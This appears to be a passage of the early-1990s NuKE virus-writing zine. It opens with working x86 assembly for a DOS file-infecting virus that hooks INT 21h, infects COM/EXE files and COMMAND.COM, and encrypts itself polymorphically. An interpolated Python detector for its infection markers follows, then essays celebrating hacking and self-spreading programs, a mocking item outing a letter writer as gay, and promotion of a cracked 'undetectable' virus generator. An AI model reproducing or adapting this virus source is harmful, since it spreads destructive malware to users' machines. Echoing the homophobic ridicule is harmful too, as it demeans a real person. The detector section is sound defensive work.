;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 
                                                                           
Load_Program:                                                              
        Cmp     Al, 01h                                                    
        Je      Disinfect_DEBUG                                            
        Cmp     Al, 0FFh                                                   
        Je      Infect_COMSPEC                                             
        Call    Infect_File                                                
        Jmp     Run_21                                                     
                                                                           
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 
                                                                           
Infect_COMMAND:                                                            
        Push    Dx                                                         
        Push    Ds                                                         
        Mov     Dx, offset Command_File                                    
        Push    Cs                                                         
        Pop     Ds                                                         
        Mov     Byte ptr Ds:Command_Flag, 0FFh                             
        Call    Infect_File                                                
        Pop     Ds                                                         
        Pop     Dx                                                         
        Iret                                                               
                                                                           
Infect_COMSPEC:                                                            
        Mov     Ah, 51h                                                    
        Call    Do_21                                                      
        Mov     Es, Bx                                                     
        Mov     Ds, Es:[002Ch]                                             
        Xor     Si, Si                                                     
        Push    Cs                                                         
        Pop     Es                                                         
LP00:   Mov     Di, offset COMSPEC_name                                    
        Mov     Cx, 0004h                                                  
        Rep     Cmpsw                                                      
        Jcxz    LP20                                                       
LP10:   Lodsb                                                              
        Or      Al, Al                                                     
        Jne     LP10                                                       
;       Cmp     Al, Byte ptr [Si]                                          
        Cmp     Byte ptr [Si], 00                                          
        Jne     LP00                                                       
        Jmp     Infect_COMMAND                                             
LP20:   Mov     Dx, Si                                                     
        Mov     Byte ptr Cs:Command_Flag, 0FFh                             
        Call    Infect_File                                                
        IRet                                                               
                                                                           
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 
                                                                           
Disinfect_DEBUG:                                                           
        Push    Es                                                         
        Push    Bx                                                         
        Call    Do_21                                                      
        Pop     Bx                                                         
        Pop     Es                                                         
        Call    Save_Regs                                                  
        Jb      LP30                                                       
        Xor     Cx, Cx                                                     
        Lds     Si, Dword ptr Es:[Bx].12h                                  
        Push    Ds                                                         
        Push    Si                                                         
        Mov     Di, 0100h                                                  
        Cmp     Si, Di                                                     
        Jl      DI00                                                       
        Ja      LP31                                                       
        Lodsb                                                              
        Cmp     Al, 0E9h                                                   
        Jne     LP31                                                       
        Lodsw                                                              
        Push    Ax                                                         
        Lodsb                                                              
        Cmp     Al, 'O'                                                    
        Pop     Si                                                         
        Jne     LP31                                                       
        Add     Si, 103h                                                   
        Inc     Cx                                                         
        Inc     Cx                                                         
        Pop     Ax                                                         
        Push    Si                                                         
        Push    Ds                                                         
        Pop     Es                                                         
        Jmp     short DI10                                                 
DI00:   Lea     Di, Dword ptr [Bx].0Eh                                     
        Cmp     Word ptr Es:[Di].00h, offset Virus_End+Stack_Size-2        
        Jne     LP31            ; Note 4B01/decrements stack by 2          
DI10:   Lodsb                                                              
        Cmp     Al, 0BBh                                                   
        Jne     LP31                                                       
        Lodsw                                                              
        Push    Ax                                                         
        Lodsw                                                              
        Cmp     Ax, Word ptr Cs:[V04]                                      
        Pop     Si                                                         
        Jne     LP31                                                       
        Add     Si, offset Start_Code-(offset V05-V05_Back)                
        Jcxz    DI15                                                       
        Rep     Movsw                                                      
        Jmp     short DI25                                                 
                                                                           
DI15:   Mov     Ah, 51h                                                    
        Call    Do_21                                                      
        Add     Bx, 0010h                                                  
        Mov     Ax, [Si+06h]                                               
        Dec     Ax                                                         
        Dec     Ax                                                         
        Stosw                                                              
        Mov     Ax, [Si+04h]                                               
        Add     Ax, Bx                                                     
        Stosw                                                              
        Movsw                                                              
        Lodsw                                                              
        Add     Ax, Bx                                                     
        Stosw                                                              
DI25:   Pop     Di                                                         
        Pop     Es                                                         
        Xchg    Cx, Ax                                                     
        Mov     Cx, offset Virus_End                                       
        Rep     Stosb                                                      
        Jmp     short LP32                                                 
                                                                           
LP31:   Pop     Ax                                                         
        Pop     Ax                                                         
LP32:   Xor     Ax, Ax                                                     
        Clc                                                                
LP30:   Call    Restore_Regs                                               
        Retfar  0002h                                                      
                                                                           
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 
                                                                           
Open_File       Proc    Near                                               
        Call    Save_Regs                                                  
        Mov     Si, Dx                                                     
OF00:   Lodsb                                                              
        Or      Al, Al                                                     
        Je      OF50                                                       
        Cmp     Al, '.'                                                    
        Jne     OF00                                                       
        Mov     Di, offset File_Exts-3                                     
        Push    Cs                                                         
        Pop     Es                                                         
        Mov     Cx, 0003h                                                  
OF10:   Push    Cx                                                         
        Push    Si                                                         
        Mov     Cl, 03h                                                    
        Add     Di, Cx                                                     
        Push    Di                                                         
OF12:   Lodsb                                                              
        And     Al, 5Fh                                                    
        Cmp     Al, Byte ptr Es:[Di]                                       
        Jne     OF15                                                       
        Inc     Di                                                         
        Loop    OF12                                                       
        Call    Infect_File                                                
        Add     Sp, +6                                                     
        Jmp     short OF50                                                 
OF15:   Pop     Di                                                         
        Pop     Si                                                         
        Pop     Cx                                                         
        Loop    OF10                                                       
OF50:   Call    Restore_Regs                                               
        Ret                                                                
Open_File       Endp                                                       
                                                                           
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 
                                                                           
Infect_File     Proc    Near                                               
        Call    Save_Regs                                                  
        Mov     Ax, 4300h                                                  
        Call    Do_21                                                      
        Jb      IF00                                                       
        Push    Cx                                                         
        And     Cl, 01h                                                    
        Cmp     Cl, 01h                                                    
        Pop     Cx                                                         
        Jne     H00                                                        
        And     Cl, 0FEh                                                   
        Mov     Ax, 4301h                                                  
        Call    Do_21                                                      
H00:    Mov     Ax, 3D02h                                                  
        Call    Do_21                                                      
        Jnb     IF02                                                       
IF00:   Jmp     IFE4                                                       
IF02:   Xchg    Bx, Ax                                                     
        Push    Cs                                                         
        Push    Cs                                                         
        Pop     Ds                                                         
        Pop     Es                                                         
        Mov     Ax, 5700h                                                  
        Call    Do_21                                                      
        Push    Dx                                                         
        Push    Cx                                                         
        And     Cl, 1Fh                                                    
        Cmp     Cl, 1Fh                                                    
        Je      IF05                                                       
        Mov     Dx, offset Exe_Header                                      
        Mov     Cx, offset Exe_Header_End-offset Exe_Header                
        Mov     Ah, 3Fh                                                    
        Call    Do_21                                                      
        Jnb     IF10                                                       
IF05:   Stc                                                                
        Jmp     IFE2                                                       
IF10:   Cmp     Ax, Cx                                                     
        Jne     IF05                                                       
        Xor     Dx, Dx                                                     
        Mov     Cx, Dx                                                     
        Mov     Ax, 4202h                                                  
        Call    Do_21                                                      
        Or      Dx, Dx                                                     
        Jne     IF12                                                       
        Cmp     Ax, offset Virus_End+Stack_Size                            
        Jb      IF05                                                       
IF12:   Cmp     Word ptr Ds:Sign, 'ZM'                                     
        Je      EXE_type                                                   
                                                                           
COM_type:                                                                  
        Cmp     Byte ptr Ds:Sign+3, 'O'                                    
        Je      IF05                                                       
        Cmp     Byte ptr Ds:Command_Flag, 00h                              
        Je      CT00                                                       
        Sub     Ax, offset Virus_End                                       
        Xchg    Dx, Ax                                                     
        Xor     Cx, Cx                                                     
        Mov     Ax, 4200h                                                  
        Call    Do_21                                                      
CT00:   Mov     Si, offset Sign                                            
        Mov     Di, offset Start_Code                                      
        Movsw                                                              
        Movsw                                                              
        Sub     Ax, 0003h                                                  
        Mov     Byte ptr Ds:Sign, 0E9h                                     
        Mov     Word ptr Ds:Sign+1, Ax                                     
        Mov     Byte ptr Ds:Sign+3, 'O'                                    
        Add     Ax, (offset V05-V05_Back)+0103H                            
        Jmp     short IF30                                                 
                                                                           
EXE_type:                                                                  
        Cmp     Word ptr Ds:Stack_Sp, offset Virus_End+Stack_Size          
        Je      IF05                                                       
        Cmp     Word ptr Ds:Overlay_Num, 0000h                             
        Jne     IF05                                                       
        Push    Dx                                                         
        Push    Ax                                                         
        Mov     Cl, 04h                                                    
        Ror     Dx, Cl                                                     
        Shr     Ax, Cl                                                     
        Add     Ax, Dx                                                     
        Sub     Ax, Word ptr Ds:Size_Header                                
        Mov     Si, offset Start_Ip                                        
        Mov     Di, offset Start_Code                                      
        Movsw                                                              
        Movsw                                                              
        Mov     Si, offset Stack_Ss                                        
        Movsw                                                              
        Movsw                                                              
        Mov     Word ptr Ds:Start_Cs, Ax                                   
        Mov     Word ptr Ds:Stack_Ss, Ax                                   
        Mov     Word ptr Ds:Stack_Sp, offset Virus_End+Stack_Size          
        Pop     Ax                                                         
        Pop     Dx                                                         
        Push    Ax                                                         
        Add     Ax, offset Virus_End+Stack_Size                            
        Jnb     IF29                                                       
        Inc     Dx                                                         
IF29:   Mov     Cx, 512                                                    
        Div     Cx                                                         
        Mov     Word ptr Ds:File_Size, Ax                                  
        Mov     Word ptr Ds:Remainder, Dx                                  
        Pop     Ax                                                         
        And     Ax, 000Fh                                                  
        Mov     Word ptr Ds:Start_Ip, Ax                                   
        Add     Ax, (offset V05-V05_Back)                                  
                                                                           
IF30:   Mov     Word ptr Ds:V00+1, Ax                                      
        Push    Ds                                                         
        Xor     Si, Si                                                     
        Mov     Ds, Si                                                     
        Mov     Ax, Word ptr Ds:[046Ch]                                    
        Pop     Ds                                                         
        Push    Bx                                                         
        Mov     Byte ptr Ds:V01+1, Ah                                      
        And     Ax, 000Fh                                                  
        Xchg    Bx, Ax                                                     
        Shl     Bx, 01h                                                    
        Mov     Ax, Word ptr [Bx].Random_AL                                
        Mov     Word ptr Ds:V03, Ax                                        
        Mov     Di, offset Real_End                                        
        Mov     Cx, offset Virus_End                                       
        Push    Cx                                                         
        Cld                                                                
        Rep     Movsb                                                      
        Mov     Bx, (offset V05-V05_Back)                                  
        Push    Word ptr [Bx]                                              
        Mov     Byte ptr [Bx+V05_Back], 0C3h                               
        Push    Bx                                                         
        Xor     Byte ptr Ds:([Bx+V02+1])-(offset V05-V05_Back), 28h        
        Add     Bx, offset Real_End     ; Toggle ADD [BX],AL/SUB [BX],AL   
        Call    V04                                                        
        Pop     Bx                                                         
        Pop     Word ptr [Bx]                                              
        Mov     Dx, offset Real_End                                        
        Pop     Cx                                                         
        Pop     Bx                                                         
        Mov     Ah, 40h                                                    
        Call    Do_21                                                      
IFE1:   Jb      IFE2                                                       
        Xor     Dx, Dx                                                     
        Mov     Cx, Dx                                                     
        Mov     Ax, 4200h                                                  
        Call    Do_21                                                      
        Jb      IFE2                                                       
        Mov     Dx, offset Exe_Header                                      
        Mov     Cx, offset Exe_Header_End-offset Exe_Header                
        Mov     Ah, 40h                                                    
        Call    Do_21                                                      
IFE2:   Pop     Cx                                                         
        Pop     Dx                                                         
        Jb      IFE3                                                       
        Cmp     Byte ptr Ds:Command_Flag, 0FFh                             
        Je      IFE3                                                       
        Or      Cl, 1Fh                                                    
IFE3:   Mov     Ax, 5701h                                                  
        Call    Do_21                                                      
        Mov     Ah, 3Eh                                                    
        Call    Do_21                                                      
IFE4:   Mov     Byte ptr Cs:Command_Flag, 00h                              
        Call    Restore_Regs                                               
        Ret                                                                
Infect_File     Endp                                                       
                                                                           
Do_21   Proc    Near                                                       
        Pushf                                                              
        Call    Dword ptr Cs:Saved_21                                      
        Ret                                                                
Do_21   Endp                                                               
                                                                           
Save_Regs:                                                                 
        Push    Bp                                                         
        Mov     Bp, Sp                                                     
        Push    Bx                                                         
        Push    Cx                                                         
        Push    Dx                                                         
        Push    Si                                                         
        Push    Di                                                         
        Push    Ds                                                         
        Push    Es                                                         
        Pushf                                                              
        Xchg    [Bp+02], Ax                                                
        Push    Ax                                                         
        Mov     Ax, [Bp+02]                                                
        Ret                                                                
                                                                           
Restore_Regs:                                                              
        Pop     Ax                                                         
        Xchg    [Bp+02], Ax                                                
        Popf                                                               
        Pop     Es                                                         
        Pop     Ds                                                         
        Pop     Di                                                         
        Pop     Si                                                         
        Pop     Dx                                                         
        Pop     Cx                                                         
        Pop     Bx                                                         
        Pop     Bp                                                         
        Ret                                                                
                                                                           
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 
                                                                           
Random_AL:                                                                 
        Inc     Al                      ; 0                                
        Dec     Al                      ; 1                                
        Inc     Ax                      ; 2                                
        Inc     Ax                                                         
        Dec     Ax                      ; 3                                
        Dec     Ax                                                         
        Add     Al, Cl                  ; 4                                
        Sub     Al, Cl                  ; 5                                
        Xor     Al, Cl                  ; 6                                
        Xor     Al, Ch                  ; 7                                
        Not     Al                      ; 8                                
        Neg     Al                      ; 9                                
        Ror     Al, 01h                 ; A                                
        Rol     Al, 01h                 ; B                                
        Ror     Al, Cl                  ; C                                
        Rol     Al, Cl                  ; D                                
        Nop                             ; E                                
        Nop                                                                
        Add     Al, Ch                  ; F                                
                                                                           
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 
                                                                           
COMSPEC_name    db      'COMSPEC='                                         
COMMAND_file    db      '\COMMAND.COM',0                                   
FILE_Exts       db      'COMEXEOVL'                                        
NUM_Exts        equ     3                                                  
                                                                           
Start_Code      dw      00000h                                             
                dw      0FFF0h                                             
Start_Stack     dw      ?                                                  
                dw      0FFFFh                                             
                                                                           
        Org     400h                                                       
Virus_End:                                                                 
                                                                           
Saved_24        dw      ?,?                                                
                                                                           
Command_Flag    db      0                                                  
                                                                           
Temp            dw      ?                                                  
                                                                           
Exe_Header:                                                                
Sign            dw      ?                                                  
Remainder       dw      ?                                                  
File_Size       dw      ?                                                  
Num_Real        dw      ?                                                  
Size_Header     dw      ?                                                  
Min_Above       dw      ?                                                  
Max_Above       dw      ?                                                  
Stack_Ss        dw      ?                                                  
Stack_Sp        dw      ?                                                  
CheckSum        dw      ?                                                  
Start_Ip        dw      ?                                                  
Start_Cs        dw      ?                                                  
Display_Real    dw      ?                                                  
Overlay_Num     dw      ?                                                  
Exe_Header_End:                                                            
                                                                           
Real_End:                                                                  
                                                                           
Code    Ends                                                               
        End     Virus_Begin                                                
;==========================================================================
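
Added example (not part of the NuKE listing): a Python checker for the host-file markers that Infect_File above leaves behind, namely the 1Fh seconds field set through 5701h, the E9 ?? ?? 'O' COM header, and the EXE header with SS = CS and an entry point exactly 400h bytes before end of file. Function names, the zero-filled fixtures and the two-indicator threshold are assumptions made here; Stack_Size is defined outside this part of the listing, so the SP test is optional.

```python
import struct

VIRUS_LEN = 0x400   # "Org 400h" before Virus_End: length written by the AH=40h append
COM_MARK = 0x4F     # 'O', stored at Sign+3 of a COM host
MZ_FIELDS = ("magic", "cblp", "cp", "crlc", "cparhdr", "minalloc", "maxalloc",
             "ss", "sp", "csum", "ip", "cs", "lfarlc", "ovno")


def seconds_marker(time_word):
    """FAT time word whose 5-bit seconds field is 1Fh (62 s, never a valid time)."""
    return (time_word & 0x1F) == 0x1F


def parse_mz(data):
    """Return the 14-word EXE header as a dict, or None when the file is not MZ."""
    if len(data) < 28 or data[:2] != b"MZ":
        return None
    return dict(zip(MZ_FIELDS, struct.unpack_from("<14H", data, 0)))


def check_com(data):
    """Indicators left in a COM host by the COM_type branch."""
    reasons = []
    if len(data) < 4 or data[0] != 0xE9:
        return reasons
    if data[3] == COM_MARK:
        reasons.append("COM: byte 3 is 'O' behind an E9 near jump")
    target = 3 + struct.unpack_from("<H", data, 1)[0]   # file offset the jump reaches
    if target == len(data) - VIRUS_LEN:
        reasons.append("COM: jump lands exactly 400h bytes before end of file")
    return reasons


def check_exe(data, stack_size=None):
    """Indicators left in an EXE header by the EXE_type branch."""
    hdr = parse_mz(data)
    reasons = []
    if hdr is None:
        return reasons
    entry = (((hdr["cparhdr"] + hdr["cs"]) & 0xFFFF) << 4) + hdr["ip"]
    if hdr["ss"] == hdr["cs"] and hdr["ip"] <= 0x0F and entry == len(data) - VIRUS_LEN:
        reasons.append("EXE: SS == CS and CS:IP points 400h bytes before end of file")
    # Stack_Size is not visible in this excerpt, so the SP comparison is opt-in.
    if stack_size is not None and hdr["sp"] == VIRUS_LEN + stack_size:
        reasons.append("EXE: initial SP equals Virus_End + Stack_Size")
    return reasons


def scan(data, time_word=None, stack_size=None):
    """Combine the checks; one indicator alone is treated as too weak to flag."""
    reasons = check_exe(data, stack_size) if data[:2] == b"MZ" else check_com(data)
    # The listing skips the timestamp mark when Command_Flag is 0FFh,
    # so a normal timestamp does not clear a file.
    if time_word is not None and seconds_marker(time_word):
        reasons.append("timestamp: seconds field is 1Fh")
    return {"suspicious": len(reasons) >= 2, "reasons": reasons}


def pack_dos_time(hour, minute, sec_field):
    return (hour << 11) | (minute << 5) | sec_field


def constructed_com(orig_len=0x500, marked=True):
    """Constructed fixture: zero-filled bytes only, with or without the header marks."""
    body = bytearray(orig_len + VIRUS_LEN)
    if marked:
        body[0:4] = struct.pack("<BHB", 0xE9, orig_len - 3, COM_MARK)
    else:
        body[0:4] = b"\xE9\x10\x00\x90"
    return bytes(body)


def constructed_exe(orig_len=0x365, hdr_paras=2, marked=True):
    """Constructed fixture: MZ header over zero bytes; SP value 0800h is made up."""
    cs = (orig_len >> 4) - hdr_paras if marked else 0
    ip = orig_len & 0x0F if marked else 0x20
    ss = cs if marked else 0x40
    total = orig_len + VIRUS_LEN
    hdr = struct.pack("<14H", 0x5A4D, total % 512, (total + 511) // 512, 0,
                      hdr_paras, 0, 0xFFFF, ss, 0x0800, 0, ip, cs, 0x1C, 0)
    return hdr + bytes(total - len(hdr))


if __name__ == "__main__":
    for name, blob, tw in (
        ("marked.com", constructed_com(), pack_dos_time(15, 30, 31)),
        ("clean.com", constructed_com(marked=False), pack_dos_time(9, 0, 4)),
        ("marked.exe", constructed_exe(), pack_dos_time(15, 30, 31)),
    ):
        print(name, scan(blob, tw))
```

On a FAT image the time word comes from the raw directory entry; timestamps read through a modern OS API are normalised and may not preserve the 62-second value.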
===========================================================================
Evolution of The Cyberculture                                              
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                              
                                                                           
Something's happening here. What it is ain't exactly clear. There's a      
punk with a computer over there, tellin' me I got to beware...             
                                                                           
These days, a new breed of young politicized radicals, known as
cyberpunks, roam a techno-underground. These cyberpunks are computer
cowboys riding the trails of cyberspace, circumventing software barriers
in search of information and services, or sometimes just to wreak a little
mischievous havoc. They've got the equipment and, they say, the technical
know-how to slip into virtually any computer system and effect changes
with global ramifications. They could effectively cripple the economy or
shut down communications systems round the world. Cyberpunks hold the
potential for becoming the most powerful countercultural force ever.
                                                                           
The government has launched at least two major operations, one in 1990     
called Operation Sundevil, to quash the movement. As Secret Service Special
Agent John F. Lewis put it, "There are some very talented individuals who  
are unfortunately misdirecting their energies. But to say they're leaps and
bounds ahead of law enforcement personnel isn't true."                     
                                                                           
Our CyberCulture has been built by the best; it was perhaps started by a
tall and slender person, wearing black jeans and sporting a pair of John
Lennon specs, whom we know as Michael Synergy. Synergy was your basic
computer punk: he spent his time exploring cyberspace, staging his own
quiet protests by going where he wanted, when he wanted. Synergy became so
adept at infiltrating systems that he's become a legend; today he remains
something of an icon in the techno-underground.
                                                                           
Synergy explains that the point of most of his adventures was to become
educated. At that time there wasn't a C compiler on microcomputers, so he'd
break into Bell Labs just to learn C. Most hackers, Synergy says, use their
talents simply to learn. In the very beginning Synergy managed to slip into
a supposedly secure top-secret computer network run by the intelligence
community and the Department of Defense (DOD), whereupon the DOD took him
out of cyber-circulation and brought him in to conduct "penetration testing
and security design" for the National Security Agency, Secret Service, and
FBI, as well as the DOD.
                                                                           
Synergy created a huge spark that has developed into our current
cyberpunk movement. Science fiction took off, beginning with William
Gibson's _Neuromancer_ in 1984. The well-known movie
_War Games_ was amongst the first to draw ME (Rock Steady) into the
cyberpunk world. Other cyberpunk-oriented works by writers such as Bruce
Sterling (_Schismatrix_, _Islands in the Net_), Pat Cadigan (_Mindplayers_,
_Pretty Boy Crossover_) and John Shirley (_Eclipse Corona_) captured SF fans.
Gibson also came back with two more novels, _Count Zero_ and _Mona Lisa
Overdrive_, as well as an anthology of short stories, _Burning Chrome_.
                                                                           
Of course we can say this all began with Ridley Scott's 1980 movie
_Blade Runner_, loosely based on Philip K. Dick's novel "Do Androids Dream
of Electric Sheep?" The flood has even spilled over into the so-called
cyberpunk bands, which have European roots, including Front-242 (Belgium),
Laibach (Yugoslavia) and Can (Germany).
                                                                           
The flood of culture certainly attracted several punks, many of whom can
now trace their links to this SF culture. However, just like "hacker", the
term "cyberpunk" has also come to mean "computer criminal", and cases like
the 1988 Internet "worm" have undoubtedly fed the crackdown fever. Created
by 25-year-old Robert Morris, the worm shut down some 6,500 computers and
caused an estimated $150,000 to $200 million worth of damages to computer
systems nationwide.
                                                                           
Since then, there have been several instances of what the hackers claim    
are government attempts to suppress the cyberpunk media. Steve Jackson     
Games is a case in point. Secret Service agents raided this small Austin-  
based game manufacturer, publishers of fantasy-role-playing games, in March
of 1990.                                                                   
                                                                           
With the recent arrests of numerous hackers for illegal entry and data     
possession, the battles over control of the electronic frontier and        
hackers' rights are now being waged in courts. One critical issue is       
whether information belongs to a given corporation or government or        
whether it belongs to the world.                                           
                                                                           
Certainly what started off as science fiction isn't science fiction any
more. The several arrests are meant to make an example, and perhaps to
scare us back "into place." Of course this is where the NuKE turning
point arrives: rather than doing the hacking ourselves and putting
ourselves at risk against the lawman, there is the idea of making a program
that works like us, its mission to bypass software restrictions and perhaps
to send a message to all, or to make the world fall to its knees and go
crying to Paul Ferguson for help. I can assure you that the cyberpunk
future is still up for grabs, between utopia and dystopia, and whatever it
will be, it will be a long, hard battle to the end.
                                                                           
                        Rock Steady and The NuKE Associates                
===========================================================================
===========================================================================
The Truth About Gary...                                                    
~~~~~~~~~~~~~~~~~~~~~~~                                                    
                                                                           
The following is an actual letter to the editor from the January 18th      
issue of the _Chicago Tribune_ (sec. 1, p. 12).  I am not making this up.  
For your convenience, I've typed it up just as it appears in the paper:    
                                                                           
                                                                           
On tolerance                                                               
                                                                           
  OAK   PARK   ---   This  is  in                                          
response  to   "A  battle for the                                          
military's  soul,"   by    Robert                                          
Maginnis.                                                                  
  How  nice  of  you,  sir,  as a                                          
lieutenant colonel, to be able to                                          
express    the    views   of   an                                          
organization   of   close   to  1                                          
million employees! I also respect                                          
that    you,     as    a   stated                                          
heterosexual,   also   know   the                                          
tendencies  of  the approximately
2.56  million  homosexuals in the                                          
United  States.   And  I,  having                                          
proudly  served  seven  years  in                                          
the military, was doing it wrong!                                          
  I    should    have,   as     a                                          
homosexual   being,   been   more                                          
promiscuous,    tried    suicide,                                          
become  an  alcoholic, contracted                                          
a  sexual  disease,  had close to                                          
500  partners (wow!),  and abused                                          
children to boot.                                                          
  As  to  the   transfusions   of                                          
blood,  I  guess  the rest of the                                          
world is less risky, with 90 per-                                          
cent  of  HIV  infections  world-                                          
wide being within the heterosexual                                         
sphere.   Furthermore,  the  ter-                                          
minology   you  attempt  to  use,                                          
pro-gay sensitivity  or re-educa-                                          
tion  classes,  is  laughable.                                             
  All   we 're   asking  is to be                                          
treated  with  respect  as  human                                          
beings.  The  rest  of  the world                                          
lives  with these gay people; why                                          
in  the hell shouldn't you?  Rec-                                          
ognize  the  right to be human in                                          
all our ways.                                                              
                                                                           
               Gary Watson                                                 
                                                                           
               ^^^^^^^^^^^                                                 
Aha!  So the truth finally comes out Gary!  We all knew it all along!      
I'm just glad that you came out of the closet by submitting your letter    
to a major newspaper...                                                    
                                                                           
                        Nowhere Man/NuKE                                   
===========================================================================
===========================================================================
Files Included With NuKE Info-Journal #5                                   
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                   
                                                                           
DETECTOR.ZIP                                                               
~~~~~~~~~~~~                                                               
Included with this kit are a few .ZIPs that our two good friends           
wrote. The first is called DETECTOR.ZIP. It consists of a                  
"strain extractor" by Savage Beast/NuKE. This software will be able        
to help you to catch your funny viruses when no scanner finds them.        
Inside the .ZIP there are two files, TEST1.COM and TEST2.COM. They         
should be infected, then reset your computer and execute the               
DETECTOR program. Have fun and use the program in good health!
                                                                           
Provided by:  Savage Beast                                                 
                                                                           
                                                                           
GENVIRUS.ZIP                                                               
~~~~~~~~~~~~                                                               
GenVirus is a virus generator developed in France. This program was        
ORIGINALLY in French, and "crippled," meaning you had to send the          
dickweed programmer mondo money for a legit copy. So we gave it            
to Rock Steady, who cracked the shit out of the file! Being in Canada      
and stranded in Quebec (French-Pepper land), Rock Steady was able to       
translate the WHOLE GenVirus program into English! It was tough, being     
written in C++, but once you live and breathe ASM it's just a matter of
time. Anyhow thanks to Savage Beast for getting us a copy of this program! 
REMEMBER: ALL the viruses created with GenVirus are UNDETECTABLE!          
The program ONLY compiles binary code, and attaches the virus to a         
"dummy" .COM file, but nevertheless it was developed AFTER VCL v1.0,       
(VCL changed the WHOLE WORLD!), and still goes undetectable, as people     
never were able to crack the program...<hehe>                              
                                                                           
Provided by:  Savage Beast                                                 
Cracked by:   Rock Steady                                                  
                                                                           
                                                                           
MCAFEE.STR                                                                 
~~~~~~~~~~                                                                 
Is a Product of Screaming Radish from Australia that extracts all virus    
signatures from any version of McAfee Scan. We are unable to release the   
product in this info journal as McAfee may restructure their virus format  
of saving virus signatures, as they can do so, by simply changing one or
two small adjustments, therefore this program is not available to the      
general public. But if you want to get a copy call any of the NuKE Support 
systems.                                                                   
                                                                           
Provided: Screaming Radish                                                 
                                                                           
                        The NuKE Associates                                
===========================================================================
===========================================================================
              NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE                      
              uK                                   E-                      
              KE              CREDITS              -N                      
              E-                                   Nu                      
              -NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuK                      
                                                                           
NuKE would like to send its extended thanks to all supporters and members  
that have put themselves on the line to be with us. Mainly:                
                                                                           
Death Angel           (416)   [Thanks for your support! (And source!)]     
Rock Steady           (514)   [You have the right to remain silent. You..] 
Pure Energy           (514)   [I have a Board? Naaa...]                    
Silent Shadow         (514)   [What?, Who?, How?, When?, Where?, Why?]     
Nowhere Man           (708)   [See, no capital "W" Nowhere!]               
ARiSToTLE             (804)   [TRISKAIDEKAPHOBIA - one of a kind dude.]    
FireCracker           (804)   [Huh, VGA? What's VGA? Gimme my money back!]
Dark Angel            (819)   [Can't have a group without you, huh?]       
Savage Beast          (+41)   [Hey where's my limo???]                     
Ford Fairlane         (+46)   [That's for staying on our side!]            
Tormentor/DY          (+46)   ["Fame" is truly an evil]
Phrozen Doberman      (+61)   [Gooooood Daaaaay...]                        
Screaming Radish      (+61)   [Beastiality you say?...humm]                
TäLöN                 (+61)   [Where's my XXX calendar of the AVers?]      
Shidaq Arl'hur        (+61)   [Welcome aboard mate!]                       
The Wierd One         (+61)   [FCB, how's it taste?]                       
The Dark Elf          (+61)   [Scan strings, who needs scan strings?]      
                                                                           
(Ordered by area/country code.  We don't like to play favourites!)
                                                                           
Anyhow if I missed anyone SIMPLY send me e-mail, no credit ruining, no     
letter bombs, PLEASE! But I believe I put in everyone that has contributed
a lot to the NuKE Team, and we thank you in return.
                                                                           
                                                                           
NuKE Sites - NuKE Sites - NuKE Sites - NuKE Sites - NuKE Sites - NuKE Sites
---------------------------------------------------------------------------
├───[BBS Name]───────[Phone Number][Modem]──[SysOp]────────────[NuKE-Net]─┤
 Cybernetic Voilence. 514-425-4540  V32Bis  Pure Energy      American HUB  
 Total Mayhem........+613-ASK-NUKE  HST/DS  Phrozen Doberman Australian HUB
 Enigma E:N:U:N.....+41-22-3400329  V32Bis  Savage Beast     European HUB  
├─────────────────────────────────────────────────────────────────────────┤
                                                                           
I listed only the HUB systems, as that is always where you can reach any   
of us for sure. We do have many other systems, but since this file will    
not be encrypted I didn't wish to post them for reasons of security. If you
wish to join NuKENET simply call up the hub(s) closest to your area, and
you will be joined to it.
                                                                           
Currently NuKENET sites are located in Montreal, Ottawa/Hull, Toronto,     
Detroit, Chicago, Philadelphia, Richmond, Stockholm, Göteborg, Geneva,     
Amsterdam, Sofia, Melbourne, and Brisbane.                                 
                                                                           
Remember, main rules for NuKENET are that you must call the system up every
2-3 days, anything less will purge you from our net; no illegalities, no   
codes and material like that (they will be turned over to the appropriate  
law enforcement!). And we insist on an active system -- one post per month 
ain't our idea of active.                                                  
                                                                           
                        Rock Steady/NuKE                                   
===========================================================================